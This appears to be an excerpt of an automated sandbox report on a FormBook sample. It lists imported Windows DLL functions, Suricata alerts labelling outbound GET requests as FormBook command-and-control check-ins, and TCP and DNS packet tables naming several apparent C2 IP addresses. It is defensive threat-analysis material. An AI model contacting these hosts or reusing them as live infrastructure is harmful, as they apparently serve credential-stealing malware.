SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:05:56.591038+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49709	154.215.72.110	80	TCP
2025-01-11T04:06:28.680559+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49714	116.50.37.244	80	TCP
2025-01-11T04:07:50.316021+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49718	85.159.66.93	80	TCP
2025-01-11T04:08:03.688903+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49722	91.195.240.94	80	TCP
2025-01-11T04:08:25.100415+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49726	66.29.149.46	80	TCP
2025-01-11T04:08:38.475364+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49730	195.110.124.133	80	TCP
2025-01-11T04:09:07.959719+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49734	217.196.55.202	80	TCP
2025-01-11T04:09:50.449422+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49735	154.215.72.110	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:05:55.707179070 CET	49709	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:05:55.711988926 CET	80	49709	154.215.72.110	192.168.2.8
Jan 11, 2025 04:05:55.712065935 CET	49709	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:05:55.714440107 CET	49709	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:05:55.719336033 CET	80	49709	154.215.72.110	192.168.2.8
Jan 11, 2025 04:05:56.590811014 CET	80	49709	154.215.72.110	192.168.2.8
Jan 11, 2025 04:05:56.590852976 CET	80	49709	154.215.72.110	192.168.2.8
Jan 11, 2025 04:05:56.591037989 CET	49709	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:05:56.598840952 CET	49709	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:05:56.603713989 CET	80	49709	154.215.72.110	192.168.2.8
Jan 11, 2025 04:06:20.149941921 CET	49710	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:20.154736996 CET	80	49710	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:20.157819033 CET	49710	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:20.179512024 CET	49710	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:20.184330940 CET	80	49710	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:21.042572975 CET	80	49710	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:21.042701006 CET	80	49710	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:21.042861938 CET	49710	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:21.688117027 CET	49710	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:22.706346035 CET	49712	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:22.711329937 CET	80	49712	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:22.711426973 CET	49712	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:22.713421106 CET	49712	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:22.718350887 CET	80	49712	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:23.587286949 CET	80	49712	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:23.587410927 CET	80	49712	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:23.587487936 CET	49712	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:24.219136953 CET	49712	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:25.237351894 CET	49713	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:25.242145061 CET	80	49713	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:25.242229939 CET	49713	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:25.244136095 CET	49713	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:25.249006033 CET	80	49713	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:25.249021053 CET	80	49713	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:26.138714075 CET	80	49713	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:26.138736010 CET	80	49713	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:26.138880014 CET	49713	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:26.750607967 CET	49713	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:27.795726061 CET	49714	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:27.800831079 CET	80	49714	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:27.800942898 CET	49714	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:27.802752972 CET	49714	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:27.807629108 CET	80	49714	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:28.680357933 CET	80	49714	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:28.680430889 CET	80	49714	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:28.680558920 CET	49714	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:28.683118105 CET	49714	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:06:28.687982082 CET	80	49714	116.50.37.244	192.168.2.8
Jan 11, 2025 04:06:41.875205040 CET	49715	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:41.880855083 CET	80	49715	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:41.880927086 CET	49715	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:41.882797003 CET	49715	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:41.887722969 CET	80	49715	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:43.391083956 CET	49715	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:43.396159887 CET	80	49715	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:43.396219015 CET	49715	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:44.415287971 CET	49716	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:44.420344114 CET	80	49716	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:44.420458078 CET	49716	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:44.423958063 CET	49716	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:44.428755045 CET	80	49716	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:45.937944889 CET	49716	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:45.943218946 CET	80	49716	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:45.943306923 CET	49716	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:46.956517935 CET	49717	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:47.079299927 CET	80	49717	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:47.079467058 CET	49717	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:47.081713915 CET	49717	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:47.086559057 CET	80	49717	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:47.086688995 CET	80	49717	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:48.594657898 CET	49717	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:48.599653959 CET	80	49717	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:48.600089073 CET	49717	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:49.612724066 CET	49718	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:49.617646933 CET	80	49718	85.159.66.93	192.168.2.8
Jan 11, 2025 04:06:49.619937897 CET	49718	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:49.622123003 CET	49718	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:06:49.627130032 CET	80	49718	85.159.66.93	192.168.2.8
Jan 11, 2025 04:07:50.315737963 CET	80	49718	85.159.66.93	192.168.2.8
Jan 11, 2025 04:07:50.315790892 CET	80	49718	85.159.66.93	192.168.2.8
Jan 11, 2025 04:07:50.316020966 CET	49718	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:07:50.318942070 CET	49718	80	192.168.2.8	85.159.66.93
Jan 11, 2025 04:07:50.323791027 CET	80	49718	85.159.66.93	192.168.2.8
Jan 11, 2025 04:07:55.352540970 CET	49719	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:55.357400894 CET	80	49719	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:55.357542992 CET	49719	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:55.359352112 CET	49719	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:55.364125013 CET	80	49719	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:55.994306087 CET	80	49719	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:55.994421959 CET	80	49719	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:55.994524956 CET	49719	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:56.875844955 CET	49719	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:57.899908066 CET	49720	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:57.904717922 CET	80	49720	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:57.904805899 CET	49720	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:57.927006006 CET	49720	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:57.931843996 CET	80	49720	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:58.545303106 CET	80	49720	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:58.545355082 CET	80	49720	91.195.240.94	192.168.2.8
Jan 11, 2025 04:07:58.545432091 CET	49720	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:07:59.441819906 CET	49720	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:00.456439018 CET	49721	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:00.461328983 CET	80	49721	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:00.462035894 CET	49721	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:00.463826895 CET	49721	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:00.468645096 CET	80	49721	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:00.468796968 CET	80	49721	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:01.106964111 CET	80	49721	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:01.107038021 CET	80	49721	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:01.107110977 CET	49721	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:01.969362020 CET	49721	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:02.988346100 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:02.993355036 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:02.993437052 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:02.995493889 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.000323057 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688684940 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688704014 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688715935 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688736916 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688747883 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688759089 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688889980 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688901901 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.688903093 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.688903093 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.688915014 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.689012051 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.689012051 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.689194918 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.693767071 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.693828106 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.693837881 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.693978071 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.786072016 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786104918 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786156893 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786169052 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786187887 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.786241055 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.786283016 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786492109 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786555052 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786639929 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.786773920 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786794901 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:03.786823034 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.787000895 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.790743113 CET	49722	80	192.168.2.8	91.195.240.94
Jan 11, 2025 04:08:03.795584917 CET	80	49722	91.195.240.94	192.168.2.8
Jan 11, 2025 04:08:16.894202948 CET	49723	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:16.899207115 CET	80	49723	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:16.899384975 CET	49723	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:16.902034044 CET	49723	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:16.906892061 CET	80	49723	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:17.495199919 CET	80	49723	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:17.495307922 CET	80	49723	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:17.495357990 CET	49723	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:18.407180071 CET	49723	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:19.425528049 CET	49724	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:19.430629015 CET	80	49724	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:19.430725098 CET	49724	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:19.432456970 CET	49724	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:19.437381983 CET	80	49724	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:20.045742989 CET	80	49724	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:20.045809031 CET	80	49724	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:20.045897007 CET	49724	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:20.938560009 CET	49724	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:21.958134890 CET	49725	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:21.963135004 CET	80	49725	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:21.963233948 CET	49725	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:21.965121984 CET	49725	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:21.970063925 CET	80	49725	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:21.970104933 CET	80	49725	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:22.566730022 CET	80	49725	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:22.566765070 CET	80	49725	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:22.566848993 CET	49725	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:23.469589949 CET	49725	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:24.487833023 CET	49726	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:24.492932081 CET	80	49726	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:24.493175030 CET	49726	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:24.498035908 CET	49726	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:24.502963066 CET	80	49726	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:25.100174904 CET	80	49726	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:25.100255966 CET	80	49726	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:25.100414991 CET	49726	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:25.103245974 CET	49726	80	192.168.2.8	66.29.149.46
Jan 11, 2025 04:08:25.108068943 CET	80	49726	66.29.149.46	192.168.2.8
Jan 11, 2025 04:08:30.191356897 CET	49727	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:30.196382046 CET	80	49727	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:30.196522951 CET	49727	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:30.198471069 CET	49727	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:30.203396082 CET	80	49727	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:30.868482113 CET	80	49727	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:30.868797064 CET	80	49727	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:30.868918896 CET	49727	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:31.703787088 CET	49727	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:32.722456932 CET	49728	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:32.727710009 CET	80	49728	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:32.727857113 CET	49728	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:32.729330063 CET	49728	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:32.734225988 CET	80	49728	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:33.397459030 CET	80	49728	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:33.397697926 CET	80	49728	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:33.397742987 CET	49728	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:34.235085964 CET	49728	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:35.253487110 CET	49729	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:35.258599997 CET	80	49729	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:35.262171030 CET	49729	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:35.266057014 CET	49729	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:35.271075964 CET	80	49729	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:35.271233082 CET	80	49729	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:36.040844917 CET	80	49729	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:36.040899038 CET	80	49729	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:36.040961981 CET	49729	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:36.768836021 CET	49729	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:37.785651922 CET	49730	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:37.790602922 CET	80	49730	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:37.790673018 CET	49730	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:37.792973995 CET	49730	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:37.797797918 CET	80	49730	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:38.475059986 CET	80	49730	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:38.475266933 CET	80	49730	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:38.475363970 CET	49730	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:38.477941036 CET	49730	80	192.168.2.8	195.110.124.133
Jan 11, 2025 04:08:38.482764006 CET	80	49730	195.110.124.133	192.168.2.8
Jan 11, 2025 04:08:59.682215929 CET	49731	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:08:59.687874079 CET	80	49731	217.196.55.202	192.168.2.8
Jan 11, 2025 04:08:59.687956095 CET	49731	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:08:59.690491915 CET	49731	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:08:59.695274115 CET	80	49731	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:00.280297995 CET	80	49731	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:00.281029940 CET	80	49731	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:00.281080008 CET	49731	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:01.204015017 CET	49731	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:02.259859085 CET	49732	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:02.264851093 CET	80	49732	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:02.264933109 CET	49732	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:02.267472029 CET	49732	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:02.272404909 CET	80	49732	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:02.845009089 CET	80	49732	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:02.845062971 CET	80	49732	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:02.846249104 CET	49732	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:03.782145977 CET	49732	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:04.806178093 CET	49733	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:04.811132908 CET	80	49733	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:04.818142891 CET	49733	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:04.862430096 CET	49733	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:04.867429972 CET	80	49733	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:04.867527962 CET	80	49733	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:05.386902094 CET	80	49733	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:05.387176037 CET	80	49733	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:05.388668060 CET	49733	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:06.375781059 CET	49733	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.396347046 CET	49734	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.401396036 CET	80	49734	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:07.401551962 CET	49734	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.404661894 CET	49734	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.409615040 CET	80	49734	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:07.959443092 CET	80	49734	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:07.959558010 CET	80	49734	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:07.959718943 CET	49734	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.972311974 CET	49734	80	192.168.2.8	217.196.55.202
Jan 11, 2025 04:09:07.977211952 CET	80	49734	217.196.55.202	192.168.2.8
Jan 11, 2025 04:09:49.551651001 CET	49735	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:09:49.558341980 CET	80	49735	154.215.72.110	192.168.2.8
Jan 11, 2025 04:09:49.558439016 CET	49735	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:09:49.560178995 CET	49735	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:09:49.566510916 CET	80	49735	154.215.72.110	192.168.2.8
Jan 11, 2025 04:09:50.449210882 CET	80	49735	154.215.72.110	192.168.2.8
Jan 11, 2025 04:09:50.449295998 CET	80	49735	154.215.72.110	192.168.2.8
Jan 11, 2025 04:09:50.449421883 CET	49735	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:09:50.452856064 CET	49735	80	192.168.2.8	154.215.72.110
Jan 11, 2025 04:09:50.457798958 CET	80	49735	154.215.72.110	192.168.2.8
Jan 11, 2025 04:10:03.519485950 CET	49736	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:03.524522066 CET	80	49736	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:03.524641991 CET	49736	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:03.527343035 CET	49736	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:03.532211065 CET	80	49736	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:04.416059971 CET	80	49736	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:04.416117907 CET	80	49736	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:04.416193962 CET	49736	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:05.032171965 CET	49736	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:06.050307989 CET	49737	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:06.055289030 CET	80	49737	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:06.055397034 CET	49737	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:06.057199001 CET	49737	80	192.168.2.8	116.50.37.244
Jan 11, 2025 04:10:06.062058926 CET	80	49737	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:06.931744099 CET	80	49737	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:06.931849003 CET	80	49737	116.50.37.244	192.168.2.8
Jan 11, 2025 04:10:06.931988955 CET	49737	80	192.168.2.8	116.50.37.244

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:05:55.295248985 CET	59200	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:05:55.700510025 CET	53	59200	1.1.1.1	192.168.2.8
Jan 11, 2025 04:06:11.662455082 CET	53695	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:06:11.671108007 CET	53	53695	1.1.1.1	192.168.2.8
Jan 11, 2025 04:06:19.753802061 CET	53703	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:06:20.135008097 CET	53	53703	1.1.1.1	192.168.2.8
Jan 11, 2025 04:06:33.691728115 CET	58760	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:06:33.700583935 CET	53	58760	1.1.1.1	192.168.2.8
Jan 11, 2025 04:06:41.753926039 CET	58903	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:06:41.872621059 CET	53	58903	1.1.1.1	192.168.2.8
Jan 11, 2025 04:07:55.333975077 CET	56198	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:07:55.346440077 CET	53	56198	1.1.1.1	192.168.2.8
Jan 11, 2025 04:08:08.801131010 CET	62478	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:08.811189890 CET	53	62478	1.1.1.1	192.168.2.8
Jan 11, 2025 04:08:16.863879919 CET	62989	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:16.891273975 CET	53	62989	1.1.1.1	192.168.2.8
